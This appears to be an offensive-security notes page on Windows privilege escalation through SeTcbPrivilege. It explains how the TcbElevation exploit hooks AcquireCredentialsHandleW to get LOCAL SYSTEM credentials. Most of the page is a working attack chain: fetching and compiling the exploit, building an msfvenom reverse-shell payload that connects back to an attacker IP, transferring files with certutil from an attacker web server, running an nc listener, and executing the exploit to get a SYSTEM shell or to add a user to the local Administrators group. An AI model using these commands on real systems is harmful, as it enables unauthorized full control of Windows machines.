PRIMARY CATEGORY → WINDOWS PRIVESC
Theory
SeTCB is one of the most critical privileges in a Windows system. It allows a process to act as a part of the OS, particularly in authentication and token management processes
That is, an attacker that compromises a local or domain account whose primary access token has this privilege set, can leverage the latter to registry a trust process to interact with LSA and its sensitive API functions
Enumeration
Current User Privileges
whoami /privAbuse - TcbElevation.cpp
Workflow
First, we must check if the privilege in question is present and enabled in the current primary access token of the controlled user account
If not, this tool enables it for us before carrying out any of the following steps
This attack vector basically creates a new service component whose binPath is a malicious binary that we have created previously
The key point is that, before creating the service, the tool modifies its own SSPI function table in order to replace the AcquireCredentialsHandleW pointer with a custom malicious function’s memory address, namely AcquireCredentialsHandleWHook, which is defined in the exploit’s code
From that moment, any call to AcquireCredentialsHandleW will first go through the malicious hook function
Then, the exploit creates a custom service component, whose name and binPath is defined by the attacker from the command line. We do not get any access denied error when creating the service as we have the seTcbPrivilege enabled
In order to start the service, the SCM needs credentials for the specified user in charge of running the process. To do so, it calls the AcquireCredentialsHandleW function.
However, since we have set the malicious function in the SSPI function table previously, it receives all arguments from the original SCM’s call and sets the LogonID field’s value to 0x3E7, which corresponds to the LOCAL SYSTEM’s LUID ( Logon Session ID )
We receive LOCAL SYSTEM credentials as LSA trusts us
Lastly, the SCM launches the service as LOCAL SYSTEM, and the malicious binary we have set as the service’s binPath will be executed, thereby gaining code execution as this system account
Requirements
- The controlled user account must have the seTcbPrivilege enabled
Setup
Downloading the resource
curl --silent --location --request GET --remote-name 'https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178/raw/f044e4be7c59c58968dbae56e586e1400ab35f32/TcbElevation.cpp'Compiling the binary
From the attacker ⚔️
Linux 🐧
x86_64-w64-mingw32-g++ -o TcbElevation.exe TcbElevation.cpp -static -ladvapi32 -lsecur32 -lkernel32 -DUNICODE -D_UNICODE -municodeGenerating a malicious Payload
From the attacker ⚔️
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --arch x64 --platform windows --format exe --out rev.exeTransferring them to the target
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
mkdir $env:systemroot\Temp\LPE
cd $env:systemroot\Temp\LPEcertutil.exe -urlcache -split -f http://<ATTACKER_IP>/TcbElevation.exe
certutil.exe -urlcache -split -f http://<ATTACKER_IP>/rev.exeSetting up a TCP Listener
From the attacker ⚔️
rlwrap -CaR nc -nvlp <ATTACKER_PORT>Usage
From the target 🎯
.\TcbElevation.exe nonExistingService 'C:\Windows\Temp\LPE\rev.exe'Or we can simply add a controlled user account to the local Administrators group as follows
.\TcbElevation.exe nonExistingService 'net localgroup Administrators /add <CONTROLLED_USER>'